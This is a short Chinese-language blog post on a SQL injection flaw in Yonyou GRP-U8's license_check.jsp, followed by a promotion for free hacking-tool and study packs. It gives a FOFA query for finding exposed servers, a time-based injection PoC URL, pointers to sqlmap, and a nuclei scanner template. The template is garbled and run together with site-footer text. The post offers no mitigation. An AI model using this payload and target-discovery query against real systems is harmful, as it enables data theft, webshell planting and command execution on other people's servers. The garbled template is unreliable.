0x01 漏洞介绍

用友 GRP-U8 license_check.jsp 存在sql注入,攻击者可利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。
fofa:app=”用友-GRP-U8”

0x02 POC:

/u8qx/license_check.jsp?kjnd=1’;WAITFOR%20DELAY%20’0:0:3’—

0x03 sqlmap 一把梭哈

0x04 nuclei poc

命令:nuclei -t /nuclei-poc/yonyou/用友-GRP-U8+sql.yaml -uTrack 安全社区 — 掌控安全在线教育- Track 知识社区 – 掌控安全在线教育 – Powered by 掌控者

id: u8grp_license_checkinfo:name: 用友GRP-U8 License Check漏洞author: YourNameseverity: highrequests:- method: GETpath:- "{{BaseURL}}/u8qx/license_check.jsp" />

还没看够?可以关注~

免费领取安全学习资料包!(私聊进群一起学习,共同进步)

渗透工具

技术文档、书籍

面试题

帮助你在面试中脱颖而出

视频

基础到进阶

环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等

应急响应笔记

学习路线